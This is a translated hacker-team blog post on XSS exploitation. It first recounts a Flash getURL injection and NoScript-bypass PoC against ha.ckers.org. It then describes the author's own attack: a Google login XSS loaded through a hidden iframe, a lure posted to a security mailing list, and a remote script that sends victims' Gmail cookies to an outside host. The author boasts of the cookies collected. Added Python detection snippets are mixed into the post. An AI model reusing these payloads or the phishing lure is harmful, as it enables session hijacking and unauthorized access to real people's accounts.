Team: http://www.ph4nt0m.org
Blog: http://superhei.blogbus.com
I. Owning Ha.ckers.org
Some time ago, in "Owning Ha.ckers.org", Sirdarckcat and Kuza55 used XSS and other attacks in an attempt at penetration [the attack was unsuccessful, but the technical details are worth learning]. For the full technical details, refer to:
1. Sirdarckcat's blog:
http://sirdarckcat.blogspot.com/2007/11/inside-history-of-hacking-rsnake-for.html
2. rSnake's blog:
http://ha.ckers.org/blog/20071104/owning-hackersorg-or-not/
First they took advantage of a Flash file rSnake had previously used to test XSS: http://ha.ckers.org/xss.swf [access has since been denied], because the Flash file itself has an XSS [cross-site Flash; please refer to Stefano Di Paola's paper "Testing Flash Applications"]. The AS2 code looks like this:
getURL("javascript:alert(xss)", "_self", "GET"); stop();
The "Flash Lite 2.x ActionScript Language Reference" (http://livedocs.adobe.com/flashlite/2_cn/main/00000160.html) describes it as follows:
<<
getURL(url:String [, window:String [, method:String]]) : Void
.....
method:String [optional] - The GET or POST method used to send variables. If there are no variables, omit this parameter. The GET method appends the variables to the end of the URL and is used to send a small number of variables. The POST method sends the variables in a separate HTTP header and is used to send a large number of variables.
<<
When the third parameter, method, is specified as GET or POST, the movie's variables are appended to the end of the URL, which means that the URL given to getURL can have something injected into it :). Back to xss.swf:
We request: xss.swf?a=0:0;eval(alert(xss))
The resulting call in AS2 is: getURL("javascript:alert(xss)?a=0:0;eval(alert(xss))", "_self", "GET");
Note that the ? and the variable assignment are appended to the end of the URL; Sirdarckcat cleverly uses the JavaScript ternary operator (a=0:0;) to close the preceding expression and terminate the statement.
Demo:
http://60.190.243.111/superhei/xss/xss.swf?a=0:0;eval(alert(xss2))
The XSS fires successfully.
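As an added defender-side illustration (not code from the original post), the following Python models the getURL GET behaviour quoted from the Adobe reference and adds a simple static check that flags AS2 calls combining a javascript: URL with a GET/POST method. flash_get_url, find_risky_geturl, the sample AS2 lines and the raw-append behaviour are assumptions of this model.

```python
import re

# Simplified model of getURL(url, window, "GET") as the Adobe reference above
# describes it: the movie's variables are appended to the URL as ?name=value.
# Assumption: the raw text is appended; since the browser percent-decodes a
# javascript: URL before evaluating it, encoding would not change the result.
def flash_get_url(url, variables):
    """Return the URL the browser is asked to navigate to."""
    if not variables:
        return url
    query = "&".join(f"{name}={value}" for name, value in variables.items())
    return f"{url}?{query}"

# Matches getURL("<url>" [, "<window>" [, "<method>"]]) in AS2 source.
GETURL_RE = re.compile(
    r'getURL\s*\(\s*"(?P<url>[^"]*)"'
    r'(?:\s*,\s*"[^"]*"(?:\s*,\s*"(?P<method>GET|POST)")?)?\s*\)',
    re.IGNORECASE,
)

def find_risky_geturl(as2_source):
    """Flag getURL calls whose URL is a javascript: URL *and* which pass a
    GET/POST method: whatever the .swf was loaded with (?a=...) is glued onto
    the script, which is the xss.swf injection. Omitting the method argument
    is the simplest fix, since then nothing is appended."""
    hits = []
    for lineno, line in enumerate(as2_source.splitlines(), 1):
        for m in GETURL_RE.finditer(line):
            scheme = m.group("url").strip().lower()
            if m.group("method") and scheme.startswith("javascript:"):
                hits.append((lineno, m.group("url"), m.group("method").upper()))
    return hits

# Constructed AS2 snippets: the vulnerable call from xss.swf, the same call
# with the method argument dropped, and an ordinary HTTP form submission.
SAMPLE_AS2 = (
    'getURL("javascript:alert(xss)", "_self", "GET");\n'
    'stop();\n'
    'getURL("javascript:alert(xss)", "_self");\n'
    'getURL("http://example.com/submit", "_blank", "POST");\n'
)

if __name__ == "__main__":
    print(flash_get_url("javascript:alert(xss)", {"a": "0:0;eval(alert(xss))"}))
    print(find_risky_geturl(SAMPLE_AS2))
```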
The following is the PoC Sirdarckcat used:
<iframe src="http://ha.ckers.org/xss.swf?a=0:0;a/**/setter=eval;b/**/setter=atob;a=b=name;" name="...[payload]"></iframe>
They assumed rSnake used Firefox with NoScript, so the NoScript bypass above was used. NoScript has of course since fixed this bug.
a=0:0;a/**/setter=eval;b/**/setter=atob;a=b=name;
is equivalent to
eval(atob(window.name))
where atob() decodes base64.
This is another technique; I have also used encoding to get past some checks.
His payload seems to use CSRF to post a blog entry? I didn't go through the WordPress code here :).
On IRC I asked Sirdarckcat why he didn't simply steal the cookie and use it to spoof a login to the backend. He said the backend login was probably restricted by IP address.
Throughout the process, Sirdarckcat and Kuza55 paid attention to many details to achieve their goal, since their target was himself an XSS expert. For example, they first used CSS to probe the browser's history to determine whether the target had been in the admin backend [CSS was used because of NoScript], and so on ....
II. Owning Some Hackers' Gmail
Also some time ago, jx found an XSS in Google's login page: http://www.xfocus.net/articles/200711/957.html. Before xfocus published it, I used this bug for a test and, as a result, got the Gmail cookies of many security people in China :)
XSS point:
https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=true#"></script><script>alert(xss)</script>&1-=1
Usage: note that this is an HTTPS XSS. In IE we cannot get the Gmail cookie when loading it in an iframe [of course, the window.location approach jx mentioned is not stealthy]. Our targets are security people, who generally still have some security awareness. At present security people mostly use Firefox, because IE is considered too insecure, so I decided to consider only Firefox ....
The code that creates the iframe is as follows [thanks to luoluo for the pointers :)]:
<html><body>
<iframe src="" id="f"></iframe>
<script>
foourl = 'https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=true#"></sc' + 'ript><scr' + 'ipt src="http://60.190.243.111/superhei/ieav/gm.js"></scr' + 'ipt>';
document.getElementById("f").src = foourl;
alert(document.getElementById("f").src);
document.getElementById("f").style.width = 0;
document.getElementById("f").style.height = 0;
</script>
</body></html>
My payload is placed in a remote JS file: http://60.190.243.111/superhei/ieav/gm.js
So how do we get the targets to visit it? Haha, here the ph4nt0m mailing list helped me a lot; the mailing list is an ideal place for my test.
First, I posted a phpcms vulnerability announcement to the mailing list containing a link: http://60.190.243.111/superhei/ieav/phpcms.htm. phpcms.htm contains a simple analysis of a phpcms vulnerability I had found [since this was only a test, I didn't post anything tempting like an IE 0day, and the analysis is also very simple], and of course also the XSS code constructed above.
Now let's look at the real payload, the code of http://60.190.243.111/superhei/ieav/gm.js:
getURL("http://xxx.com/test.asp?cn=" + encodeURIComponent(document.cookie));
function getURL(s) {
    var image = new Image();
    image.style.width = 0;
    image.style.height = 0;
    image.src = s;
}
An Image object is used to send the cookies.
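As an added detection example (not part of the original post), this Python scans constructed Apache-style access log lines for the beacon gm.js produces: an image request whose query string carries a whole document.cookie. SAMPLE_LOG, the cookie names in it, LOG_RE, cookie_pairs and find_cookie_beacons are all constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access log (not real traffic). The third line mimics
# the beacon gm.js fires: a GET whose query carries the victim's URL-encoded
# document.cookie, with the HTTPS login page as referer. Cookie names are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2007:21:03:11 +0800] "GET /superhei/ieav/phpcms.htm HTTP/1.1" 200 2311 "-" "Mozilla/5.0 Firefox/2.0.0.9"
203.0.113.5 - - [10/Nov/2007:21:03:12 +0800] "GET /superhei/ieav/gm.js HTTP/1.1" 200 188 "https://www.google.com/accounts/ServiceLogin" "Mozilla/5.0 Firefox/2.0.0.9"
203.0.113.5 - - [10/Nov/2007:21:03:12 +0800] "GET /test.asp?cn=SID%3Dabc123%3B%20GX%3Ddef456%3B%20LSID%3Dghi789 HTTP/1.1" 404 0 "https://www.google.com/accounts/ServiceLogin" "Mozilla/5.0 Firefox/2.0.0.9"
203.0.113.9 - - [10/Nov/2007:21:05:40 +0800] "GET /search?q=xss%3Bcsrf HTTP/1.1" 200 5120 "-" "Mozilla/5.0 Firefox/2.0.0.9"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)

# document.cookie serialises as name=value pairs joined by "; ".
COOKIE_SHAPE = re.compile(r'^\s*[\w.-]+=[^;]*(?:;\s*[\w.-]+=[^;]*)+\s*$')

def cookie_pairs(value):
    """Number of name=value pairs if value looks like a whole cookie jar, else 0."""
    if not COOKIE_SHAPE.match(value):
        return 0
    return sum(1 for part in value.split(";") if "=" in part)

def find_cookie_beacons(log_text):
    """Return one record per request whose query string carries a cookie jar."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qsl percent-decodes values, so %3D/%3B become '=' and ';'.
        for name, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
            pairs = cookie_pairs(value)
            if pairs:
                hits.append({"ip": m.group("ip"), "param": name,
                             "pairs": pairs, "referer": m.group("referer")})
    return hits

if __name__ == "__main__":
    for hit in find_cookie_beacons(SAMPLE_LOG):
        print(hit)
```

The injected script in the login URL sits after #, and a URL fragment is never sent to the server, so the injection itself leaves no trace in Google's server logs; what is observable is the exfiltration request on the receiving side, which is what this check looks for.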
Then, after posting to the mailing list, I went on the evening shift. When I got off work on the first day, I found n cookies in my database :)
Throughout the process I expected my behaviour to be noticed. Unfortunately nobody followed up on the post; only one friend, our boy, blocked my attack with NoScript. I knew nothing about NoScript before I started, so I hadn't considered it at all. So the security awareness of domestic security people really should be strengthened. In fact, this attack has nothing new in it, and no technical finesse like Sirdarckcat's, but the effect is still obvious. When lis0 used XSS to get into my 163 mailbox, maybe they used the same trick?
III. Closing remarks
XSS and CSRF are the most shameless attack methods I have ever seen, especially CSRF [although it is not covered in the examples above]. This is why I have always looked down on ("bs") them, but while looking down on them, we should still study them, because hackers are everywhere :)
Many people in China only think of alert() when XSS is mentioned. Exploiting it is still quite troublesome, and actual use in penetration testing is even rarer ..., but I have reason to believe that more XSS, CSRF and other such attack methods will appear in future penetration tests.
[Finally, thanks for sharing and learning together!]